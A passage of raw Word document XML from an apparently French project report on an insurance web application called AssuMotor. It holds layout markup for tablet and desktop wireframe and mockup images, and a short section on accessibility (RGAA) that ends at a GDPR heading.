            <wp:docPr id="53253545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5457" name="Image 532535457"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1912752" cy="5056351"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00FD20B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE8D04E" wp14:editId="1D0C9882">
            <wp:extent cx="1701800" cy="4999247"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69831756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17561" name="Image 698317561"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1703859" cy="5005296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E3E55" w14:textId="77777777" w:rsidR="00FD20B2" w:rsidRPr="008E4633" w:rsidRDefault="00FD20B2" w:rsidP="008E4633">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="2977"/>
        <w:gridCol w:w="2693"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD20B2" w14:paraId="55EC5974" w14:textId="77777777" w:rsidTr="00FD20B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25BDCF40" w14:textId="71F9957B" w:rsidR="00FD20B2" w:rsidRPr="00FD20B2" w:rsidRDefault="00FD20B2" w:rsidP="00FD20B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FD20B2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Zooning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7DC49C4B" w14:textId="26AFBF79" w:rsidR="00FD20B2" w:rsidRPr="00FD20B2" w:rsidRDefault="00FD20B2" w:rsidP="00FD20B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD20B2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wireframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AACE579" w14:textId="4F36AB37" w:rsidR="00FD20B2" w:rsidRPr="00FD20B2" w:rsidRDefault="00FD20B2" w:rsidP="00FD20B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD20B2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Maquette</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49F53E65" w14:textId="27965B03" w:rsidR="008E4633" w:rsidRPr="008E4633" w:rsidRDefault="008E4633" w:rsidP="008E4633"/>
    <w:p w14:paraId="74B440E8" w14:textId="77777777" w:rsidR="008E4633" w:rsidRPr="008E4633" w:rsidRDefault="008E4633" w:rsidP="008E4633"/>
    <w:p w14:paraId="1495B88B" w14:textId="68AB3B13" w:rsidR="002A5F4C" w:rsidRPr="00460BA8" w:rsidRDefault="00DD73A8" w:rsidP="00460BA8">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460BA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>■ Version tablette</w:t>
      </w:r>
      <w:r w:rsidR="00460BA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5479BDFB" w14:textId="338BEBAC" w:rsidR="008E4633" w:rsidRDefault="00FD20B2" w:rsidP="000433E3">
      <w:pPr>
        <w:pStyle w:val="Index"/>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FCD8C25" wp14:editId="0D6B60D7">
            <wp:extent cx="2760453" cy="3795594"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1548035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55" name="Image 15480355"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2775583" cy="3816398"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00C80537">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19DCEEB1" wp14:editId="1D247CDC">
            <wp:extent cx="2743200" cy="3783701"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="66175189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1893" name="Image 661751893"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2779662" cy="3833993"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="2977"/>
        <w:gridCol w:w="2693"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C80537" w14:paraId="7B4FF517" w14:textId="77777777" w:rsidTr="006D1528">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7DB80FC9" w14:textId="535EA986" w:rsidR="00C80537" w:rsidRPr="00FD20B2" w:rsidRDefault="00C80537" w:rsidP="00C80537">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FD20B2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Zooning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19427D2B" w14:textId="66FF62AA" w:rsidR="00C80537" w:rsidRPr="00FD20B2" w:rsidRDefault="00C80537" w:rsidP="000433E3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26C8AADF" w14:textId="1FE7B999" w:rsidR="00C80537" w:rsidRPr="00FD20B2" w:rsidRDefault="00C80537" w:rsidP="00C80537">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wireframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14BC88A7" w14:textId="77777777" w:rsidR="00460BA8" w:rsidRDefault="00460BA8" w:rsidP="00460BA8">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B2DE77" w14:textId="19EAD24D" w:rsidR="00460BA8" w:rsidRDefault="003036DF" w:rsidP="003036DF">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60929934" wp14:editId="5CE80743">
            <wp:extent cx="3085106" cy="4049983"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
            <wp:docPr id="212537940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79405" name="Image 2125379405"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3101015" cy="4070867"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="573712C1" w14:textId="77777777" w:rsidR="00460BA8" w:rsidRDefault="00460BA8" w:rsidP="00460BA8">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE6E38A" w14:textId="4F903C67" w:rsidR="00460BA8" w:rsidRDefault="00460BA8" w:rsidP="00460BA8">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Maquette</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A29F510" w14:textId="77777777" w:rsidR="00460BA8" w:rsidRDefault="00460BA8" w:rsidP="00460BA8">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0BD6E7" w14:textId="23B3F77B" w:rsidR="002A5F4C" w:rsidRPr="00460BA8" w:rsidRDefault="00DD73A8" w:rsidP="00460BA8">
      <w:pPr>
        <w:pStyle w:val="StrongEmphasis"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460BA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Version </w:t>
      </w:r>
      <w:r w:rsidR="008E4633" w:rsidRPr="00460BA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bureau</w:t>
      </w:r>
      <w:r w:rsidR="00460BA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5FED3" w14:textId="3B9DEF01" w:rsidR="00C80537" w:rsidRDefault="003036DF" w:rsidP="008E4633">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34E6C3EB" wp14:editId="6E1FB182">
            <wp:extent cx="5946278" cy="2870131"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="148315142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1425" name="Image 1483151425"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6022624" cy="2906981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C9B71" w14:textId="14EE11B7" w:rsidR="00C80537" w:rsidRDefault="00C80537" w:rsidP="003036DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Zooning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="365D177C" w14:textId="77777777" w:rsidR="003036DF" w:rsidRDefault="003036DF" w:rsidP="003036DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF48453" w14:textId="118BA343" w:rsidR="003036DF" w:rsidRDefault="003036DF" w:rsidP="003036DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3502FC02" wp14:editId="193585DA">
            <wp:extent cx="5923308" cy="3911334"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="101250638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6388" name="Image 1012506388"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5957408" cy="3933851"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5638A11B" w14:textId="77777777" w:rsidR="003036DF" w:rsidRDefault="003036DF" w:rsidP="003036DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3F1025" w14:textId="50E50ACE" w:rsidR="00540A83" w:rsidRDefault="00540A83" w:rsidP="00540A83">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wireframe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52882D" w14:textId="77777777" w:rsidR="00540A83" w:rsidRDefault="00540A83" w:rsidP="003036DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A64437" w14:textId="2582EACA" w:rsidR="00540A83" w:rsidRDefault="00540A83" w:rsidP="003036DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB1C738" w14:textId="2185E405" w:rsidR="00540A83" w:rsidRDefault="00540A83" w:rsidP="003036DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="288958C1" wp14:editId="4B88A4BF">
            <wp:extent cx="5748793" cy="4078605"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="4005563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56319" name="Image 400556319"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5769361" cy="4093198"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E74DB4B" w14:textId="77777777" w:rsidR="00540A83" w:rsidRDefault="00540A83" w:rsidP="003036DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D5D420" w14:textId="1F733E0C" w:rsidR="002A5F4C" w:rsidRPr="00540A83" w:rsidRDefault="00540A83" w:rsidP="00540A83">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Maquette</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3798C1" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="4EEC1FBC" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="538A5520" w14:textId="325DCD8D" w:rsidR="002A5F4C" w:rsidRPr="00B24687" w:rsidRDefault="003239D4" w:rsidP="00B24687">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc233817754"/>
      <w:r w:rsidRPr="00B24687">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>5.2.</w:t>
      </w:r>
      <w:r w:rsidR="00B24687">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B24687">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prise en compte de l'accessibilité (RGAA)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="3185FEDD" w14:textId="0A2A25CA" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00A30B5C">
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les interfaces intègrent quelques bonnes pratiques d'accessibilité : balises sémantiques HTML5 (header, main, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>footer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) pour structurer le contenu, attribut alt="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" sur le logo, et balise </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>viewport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour garantir un affichage correct sur mobile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F21CC" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00B24687">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un axe d'amélioration identifié est l'ajout de l'attribut </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" sur la balise &lt;html&gt;, absent de l'actuel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>template</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de base Symfony, qui permettrait aux lecteurs d'écran de restituer correctement la langue du contenu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A10942F" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="09119955" w14:textId="3C10B061" w:rsidR="002A5F4C" w:rsidRPr="00B24687" w:rsidRDefault="003239D4" w:rsidP="00B24687">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc233817755"/>
      <w:r w:rsidRPr="00B24687">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>5.2.</w:t>
      </w:r>
      <w:r w:rsidR="00B24687">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00B24687">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prise en compte du RGPD</w:t>
      </w:r>
